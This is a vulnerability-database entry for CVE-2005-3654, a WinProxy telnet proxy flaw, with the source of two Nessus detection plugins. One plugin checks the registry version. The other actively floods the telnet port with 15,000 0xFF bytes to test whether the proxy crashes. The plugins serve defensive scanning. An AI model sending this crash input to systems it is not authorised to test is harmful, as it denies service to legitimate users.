Vulnerabilities > CVE-2005-3654 - Remote Denial Of Service vulnerability in Blue Coat Systems WinProxy Telnet

CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL

Summary

Blue Coat Systems Inc. WinProxy before 6.1a allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a large number of packets with 0xFF characters to the Telnet port (TCP 23), which corrupts the heap.

Nessus

  • NASL family: Firewalls
    NASL id: WINPROXY_61A.NASL
    description: The remote host is running WinProxy, a proxy server for Windows. According to the Windows registry, the installed version of WinProxy suffers from denial of service and buffer overflow vulnerabilities in its telnet and web proxy servers. An attacker may be able to exploit these issues to crash the proxy or even execute arbitrary code on the affected host.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 20393
    published: 2006-01-10
    reporter: This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.
    source: https://www.tenable.com/plugins/nessus/20393
    title: WinProxy < 6.1a Multiple Vulnerabilities (credentialed check)
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    
    
    include("compat.inc");
    
    # Metadata-registration block: entered when the engine sets `description`.
    # It only records the plugin's attributes and leaves via exit(0), so the
    # registry check further down never runs in this mode.
    if (description) {
      script_id(20393);
      script_version("1.14");
    
      # One credentialed check covers all three WinProxy < 6.1a CVEs
      # (the telnet proxy DoS and the web proxy issues named in the description).
      script_cve_id("CVE-2005-3187", "CVE-2005-3654", "CVE-2005-4085");
      script_bugtraq_id(16147, 16148, 16149);
    
      script_name(english:"WinProxy < 6.1a Multiple Vulnerabilities (credentialed check)");
      script_summary(english:"Checks for multiple vulnerabilities in WinProxy < 6.1a");
    
     script_set_attribute(attribute:"synopsis", value:
    "The remote proxy is affected by multiple vulnerabilities." );
     script_set_attribute(attribute:"description", value:
    "The remote host is running WinProxy, a proxy server for Windows. 
    
    According to the Windows registry, the installed version of WinProxy
    suffers from denial of service and buffer overflow vulnerabilities in
    its telnet and web proxy servers.  An attacker may be able to exploit
    these issues to crash the proxy or even execute arbitrary code on the
    affected host." );
     script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?40f07cd6" );
     script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?3a6c81a5" );
     script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?79b3006b" );
     script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?8c88612f" );
     script_set_attribute(attribute:"solution", value:
    "Upgrade to WinProxy version 6.1a or later." );
     # CVSS v2 base vector: reachable over the network, low complexity, no
     # authentication, partial confidentiality/integrity/availability impact.
     script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
     script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
     # Temporal E:F and exploit_available=true go together: a public exploit
     # exists. The Metasploit module named here targets the Host header
     # overflow, i.e. the web proxy side of this plugin's CVE set.
     script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
     script_set_attribute(attribute:"exploit_available", value:"true");
     script_set_attribute(attribute:"metasploit_name", value:'Blue Coat WinProxy Host Header Overflow');
     script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
     script_set_attribute(attribute:"plugin_publication_date", value: "2006/01/10");
     script_set_attribute(attribute:"patch_publication_date", value: "2006/01/05");
     script_set_attribute(attribute:"vuln_publication_date", value: "2006/01/05");
     script_cvs_date("Date: 2018/08/06 14:03:14");
    # "local": the version is read from the Windows registry over SMB rather
    # than by probing the proxy service, hence the SMB dependency and the
    # 139/445 port requirement below.
    script_set_attribute(attribute:"plugin_type", value:"local");
    script_end_attributes();
    
     
      # ACT_GATHER_INFO: the check only reads registry data and sends no
      # attack traffic to the proxy itself.
      script_category(ACT_GATHER_INFO);
      script_family(english:"Firewalls");
      script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.");
      # The registry view comes from smb_hotfixes.nasl; the required KB key is
      # the same one the guard below the block tests before doing anything.
      script_dependencies("smb_hotfixes.nasl");
      script_require_keys("SMB/Registry/Enumerated");
      script_require_ports(139, 445);
    
      exit(0);
    }
    
    
    # Nothing to do unless the registry was enumerated over SMB.
    if (!get_kb_item("SMB/Registry/Enumerated")) exit(0);
    
    
    # Look in the registry for evidence of WinProxy.
    # The Uninstall entry's DisplayName carries the version string; the
    # pattern below expects it to begin with "WinProxy (Version " followed
    # by the version number.
    name = get_kb_item("SMB/Registry/HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/WinProxy 6/DisplayName");
    if (!name) exit(0);
    
    # Affected: every 0.x-5.x release and 6.0x; 6.1a is the fixed release.
    # NOTE(review): a DisplayName reading exactly "6.1" (no letter suffix)
    # would not match and would be reported as clean - confirm whether such a
    # build was ever shipped before relying on this as a negative result.
    # security_hole(0) ties the finding to the host rather than to a port,
    # since this is a registry-based check.
    if (name =~ "^WinProxy \(Version ([0-5]\.|6\.0)") {
      security_hole(0);
      exit(0);
    }
    
    
  • NASL family: Windows
    NASL id: WINPROXY_TELNET_61A.NASL
    description: The remote host is running WinProxy, a proxy server for Windows. The installed version of WinProxy
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 20392
    published: 2006-01-10
    reporter: This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.
    source: https://www.tenable.com/plugins/nessus/20392
    title: WinProxy < 6.1a Telnet Proxy Remote DoS
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    
    include("compat.inc");
    
    # Metadata-registration block: entered when the engine sets `description`.
    # It only records the plugin's attributes and leaves via exit(0); the
    # network probe further down runs only outside this mode.
    if (description) {
      script_id(20392);
      script_version("1.17");
    
      # This plugin is specific to the telnet proxy DoS; the sibling
      # credentialed plugin (20393) covers the full CVE set via the registry.
      script_cve_id("CVE-2005-3654");
      script_bugtraq_id(16149);
    
      script_name(english:"WinProxy < 6.1a Telnet Proxy Remote DoS");
      script_summary(english:"Checks for denial of service vulnerability in WinProxy < 6.1a Telnet Proxy");
    
     script_set_attribute(attribute:"synopsis", value:
    "The remote telnet proxy server is affected by a denial of service
    vulnerability." );
     script_set_attribute(attribute:"description", value:
    "The remote host is running WinProxy, a proxy server for Windows. 
    
    The installed version of WinProxy's telnet proxy fails to handle a
    long string of 0xff characters.  An attacker may be able to exploit
    this issue to crash the proxy, thereby denying service to valid users." );
     script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?b140c13e" );
     script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?8c88612f" );
     script_set_attribute(attribute:"solution", value:
    "Upgrade to WinProxy version 6.1a or later." );
     # CVSS v2 base vector: network, low complexity, no authentication,
     # partial C/I/A. Same base score as the credentialed plugin.
     script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
     # Temporal E:U matches exploit_available=false: no public exploit was
     # known for this specific issue as of the plugin's last update.
     script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
     script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
     script_set_attribute(attribute:"exploit_available", value:"false");
     script_set_attribute(attribute:"plugin_publication_date", value: "2006/01/10");
     script_set_attribute(attribute:"vuln_publication_date", value: "2006/01/05");
     script_cvs_date("Date: 2018/08/06 14:03:17");
    # "remote": this check talks to the telnet proxy over the network; no
    # credentials are needed.
    script_set_attribute(attribute:"plugin_type", value:"remote");
    script_end_attributes();
    
     
      # ACT_DENIAL: the probe below deliberately tries to crash the service,
      # so it is intended to run only when the scan policy permits
      # denial-of-service checks.
      script_category(ACT_DENIAL);
      script_family(english:"Windows");
      script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.");
      # Runs against the telnet service identified by find_service1.nasl, or
      # port 23 when none was identified.
      script_dependencies("find_service1.nasl");
      script_require_ports("Services/telnet", 23);
    
      exit(0);
    }
    
    
    include("global_settings.inc");
    include("misc_func.inc");
    include("telnet_func.inc");
    
    
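    # Active check: confirm the telnet service is WinProxy's telnet proxy, send
    # it the malformed input it is known to mishandle, then decide from a fresh
    # connection whether the proxy survived.
    #
    # Verdict logic: the proxy greets every new client with the same prompt we
    # used to fingerprint it. If that prompt is still served after the flood,
    # the service is alive and must not be reported - regardless of whether it
    # answered our probe traffic, since a silent proxy (e.g. one whose outbound
    # connect to the throwaway hostname simply times out) is not a crashed one.
    # Only when the prompt is gone AND neither connection produced a reply is
    # the host reported.
    port = get_service(svc:"telnet", default: 23, exit_on_fail: 1);
    
    # Greeting the WinProxy telnet proxy prints on connect; used both for
    # fingerprinting and as the post-probe liveness signal.
    prompt = "Enter computer name to connect to.";
    
    # Make sure the service looks like WinProxy.
    banner = get_telnet_banner(port:port);
    if (
      banner && 
      prompt >< banner
    ) {
      # Flag it as a proxy.
      register_service(port:port, ipproto:"tcp", proto:"telnet_proxy");
    
      # Try to exploit it.
      soc = open_sock_tcp(port);
      if (soc) {
        banner = recv(socket:soc, length:4096);
        send(socket:soc, data:crap(length:15000, data:raw_string(0xff)));
        res = recv(socket:soc, length:1024);
        close(soc);
    
        # Now try to reconnect. Initialise the reconnect results explicitly so
        # the verdict below does not depend on NASL's treatment of unset
        # variables when the second connect fails.
        banner2 = NULL;
        res2 = NULL;
        soc = open_sock_tcp(port);
        if (soc) {
          banner2 = recv(socket:soc, length:4096);
          send(socket:soc, data:SCRIPT_NAME);
          res2 = recv(socket:soc, length:1024);
          close(soc);
        }
    
        # The proxy still serves its prompt: it survived the probe. Stop here
        # rather than risk a false positive from an unanswered hostname.
        if (banner2 && prompt >< banner2) exit(0);
    
        # There's a problem if we didn't get a response the second time.
        if (!strlen(res) && !strlen(res2)) {
          security_hole(port);
          exit(0);
        }
      }
    }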